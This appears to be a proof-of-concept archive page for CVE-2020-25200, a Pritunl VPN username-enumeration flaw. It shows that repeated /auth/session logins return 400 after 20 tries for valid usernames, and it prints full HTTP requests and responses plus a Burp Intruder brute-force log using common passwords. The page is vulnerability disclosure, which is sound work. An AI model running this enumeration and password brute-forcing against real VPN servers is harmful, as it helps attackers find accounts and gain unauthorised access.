关联漏洞
标题:pritunl 信息泄露漏洞 (CVE-2020-25200)描述:pritunl是个人开发者的一款基于Open VPN协议的分布式企业vpn服务。该产品提供可视化的Vpn连接状态。 Pritunl 1.29.2145.25 版本存在信息泄露漏洞,攻击者可利用该漏洞通过一系列/认证/会话登录尝试来枚举有效的VPN用户名。
描述
pritunl-CVE-2020-25200
介绍
CVE-2020-25200
Pritunl VPN server - Affected version: Pritunl v1.29.2145.25 553bbd
=========================
Pritunl 1.29.2145.25 allows attackers to enumerate valid VPN usernames via a series of /auth/session login attempts. Initially, the server will return error 401. However, if the username is valid, then after 20 login
attempts, the server will start responding with error 400. Invalid usernames will receive error 401 indefinitely.
=========================
To exploit this vulnerability the attacker needs to start brute-forcing the login repeatedly with the same username. Initially, the server will return error 401 but after 20 attempts, the server
will start returning error 400 if the username is valid. If the username is invalid, the server will keep returning error 401 indefinitely. Therefore it is possible to verify if the username
exists by receiving error 400.
=========================
HTTP request and response for a valid username (after 20 attempts):
POST /auth/session HTTP/1.1
Host: 192.168.1.18
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 40
Origin: https://192.168.1.18
Connection: close
Referer: https://192.168.1.18/login
{"username":"pritunl","password":"paul"}
HTTP/1.1 400 Bad Request
Cache-Control: no-cache, no-store, must-revalidate
Content-Length: 76
Content-Type: application/json
Date: Thu, 03 Sep 2020 22:42:39 GMT
Expires: 0
Pragma: no-cache
Strict-Transport-Security: max-age=31536000
X-Frame-Options: DENY
Connection: close
{"error_msg": "Too many authentication attempts.", "error": "auth_too_many"}
=========================
HTTP request and response for an invalid username (after 20 attempts):
POST /auth/session HTTP/1.1
Host: 192.168.1.18
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 39
Origin: https://192.168.1.18
Connection: close
Referer: https://192.168.1.18/login
{"username":"admin","password":"scott"}
HTTP/1.1 401 Unauthorized
Cache-Control: no-cache, no-store, must-revalidate
Content-Length: 83
Content-Type: application/json
Date: Thu, 03 Sep 2020 22:42:43 GMT
Expires: 0
Pragma: no-cache
Strict-Transport-Security: max-age=31536000
X-Frame-Options: DENY
Connection: close
{"error_msg": "Authentication credentials are not valid.", "error": "auth_invalid"}
=========================
Burp Intruder Log:
0 401 false false 370
1 123456 401 false false 370
2 password 401 false false 370
3 12345678 401 false false 370
4 qwerty 401 false false 370
5 123456789 401 false false 370
6 12345 401 false false 370
7 1234 401 false false 370
8 111111 401 false false 370
9 1234567 401 false false 370
10 dragon 401 false false 370
11 123123 401 false false 370
12 baseball 401 false false 370
13 abc123 401 false false 370
14 football 401 false false 370
15 monkey 401 false false 370
16 letmein 401 false false 370
17 696969 401 false false 370
18 shadow 401 false false 370
19 master 401 false false 370
20 666666 400 false false 362 <-------------- change of the length and of the response code
21 qwertyuiop 400 false false 362
22 123321 400 false false 362
23 mustang 400 false false 362
24 1234567890 400 false false 362
25 michael 400 false false 362
26 654321 400 false false 362
27 pussy 400 false false 362
28 superman 400 false false 362
29 1qaz2wsx 400 false false 362
30 7777777 400 false false 362
31 xxxxx 400 false false 362
32 121212 400 false false 362
33 000000 400 false false 362
34 qazwsx 400 false false 362
35 123qwe 400 false false 362
36 killer 400 false false 362
37 trustno1 400 false false 362
38 jordan 400 false false 362
39 jennifer 400 false false 362
40 zxcvbnm 400 false false 362
41 asdfgh 400 false false 362
42 hunter 400 false false 362
<<CUT>>
=========================
Security Researcher - Lukasz Studniarz
文件快照
[4.0K] /data/pocs/abee6d56b9dfc086ee07603d89af8ce9e4cc9f95
├── [4.0K] CVE-2020-25200
└── [4.0K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。